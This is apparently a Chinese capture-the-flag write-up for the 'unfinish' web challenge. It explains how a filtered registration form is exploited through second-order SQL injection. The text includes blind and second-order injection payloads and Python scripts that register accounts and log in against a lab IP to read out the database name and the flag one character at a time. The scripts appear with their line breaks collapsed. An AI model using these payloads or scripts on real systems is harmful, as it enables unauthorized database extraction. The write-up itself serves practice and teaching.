題目分析

題目描述為：SQL

題目主要功能界面分析：

主要分為注冊、登陸、以及成功登陸后的一個界面。

通過描述可以知道題目應(yīng)該存在SQL注入漏洞。

掃描得知注冊界面存在SQL注入漏洞

嘗試構(gòu)造sql盲注語句如下

{'username': "1' and ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),1)='d',SLEEP(5)) or '1'='1", 'password': 'admin', 'email': 'eamil@eamil.com'}

得到結(jié)果為

即存在過濾

測試發(fā)現(xiàn)過濾了逗號、information

那么使用盲注應(yīng)該不太行了，但是username這邊的內(nèi)容是可以執(zhí)行，所以我們將username的值拼接上查找出來的內(nèi)容，利用登陸后會顯示用戶名做到一個二次注入的效果。

解題流程

首先可知注冊的sql語句應(yīng)該為

insert into tables values('$email','$username','$password')

我們通過控制post的參數(shù)

構(gòu)造sql語句為：

insert into tables values('admin1@admin.com','0'+ascii(substr((select database()) from 1 for 1))+'0','admin')

即插入的username即拼接上了我們要查找的

查數(shù)據(jù)庫腳本如下

import requests import time from bs4 import BeautifulSoup #html解析器def getDatabase():database = ''for i in range(10):data_database = {'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",'password':'admin',"email":"admin11@admin.com"+str(i)}#注冊requests.post("http://159.138.137.79:52974/register.php",data_database)login_data={'password':'admin',"email":"admin11@admin.com"+str(i)}response=requests.post("http://159.138.137.79:52974/login.php",login_data)html=response.text #返回的頁面soup=BeautifulSoup(html,'html.parser')getUsername=soup.find_all('span')[0]#獲取用戶名username=getUsername.textif int(username)==0:breakdatabase+=chr(int(username))return databaseprint(getDatabase())

得到數(shù)據(jù)庫名為web

然后嘗試獲取表名失敗，因為過濾了information

看了評論說表名全靠猜哈哈

還是給上一個獲取flag的腳本

腳本中途獲取表名失敗了，被我注釋了~~emmm

import requests import time from bs4 import BeautifulSoup #html解析器def getDatabase():database = ''for i in range(10):data_database = {'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",'password':'admin',"email":"admin11@admin.com"+str(i)}#注冊requests.post("http://159.138.137.79:52974/register.php",data_database)login_data={'password':'admin',"email":"admin11@admin.com"+str(i)}response=requests.post("http://159.138.137.79:52974/login.php",login_data)html=response.text #返回的頁面soup=BeautifulSoup(html,'html.parser')getUsername=soup.find_all('span')[0]#獲取用戶名username=getUsername.textif int(username)==0:breakdatabase+=chr(int(username))return databaseprint(getDatabase())def getTables():tables = ''for i in range(10):data_tables = {'username':"0'+ascii(substr((select tables()) from "+str(i+1)+" for 1))+'0",'password':'admin',"email":"admin12@admin.com"+str(i)}#注冊requests.post("http://159.138.137.79:52974/register.php",data_tables)login_data={'password':'admin',"email":"admin12@admin.com"+str(i)}response=requests.post("http://159.138.137.79:52974/login.php",login_data)html=response.text #返回的頁面soup=BeautifulSoup(html,'html.parser')getUsername=soup.find_all('span')[0]#獲取用戶名username=getUsername.textif int(username)==0:breaktables+=chr(int(username))return tables ''' print(getTables()) '''def getFlag():flag = ''for i in range(40):data_flag = {'username':"0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0",'password':'admin',"email":"admin32@admin.com"+str(i)}#注冊requests.post("http://159.138.137.79:52974/register.php",data_flag)login_data={'password':'admin',"email":"admin32@admin.com"+str(i)}response=requests.post("http://159.138.137.79:52974/login.php",login_data)html=response.text #返回的頁面soup=BeautifulSoup(html,'html.parser')getUsername=soup.find_all('span')[0]#獲取用戶名username=getUsername.textif int(username)==0:breakflag+=chr(int(username))return flagprint(getFlag())

總結(jié)

以上是生活随笔為你收集整理的攻防世界-web-unfinish-从0到1的解题历程writeup的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。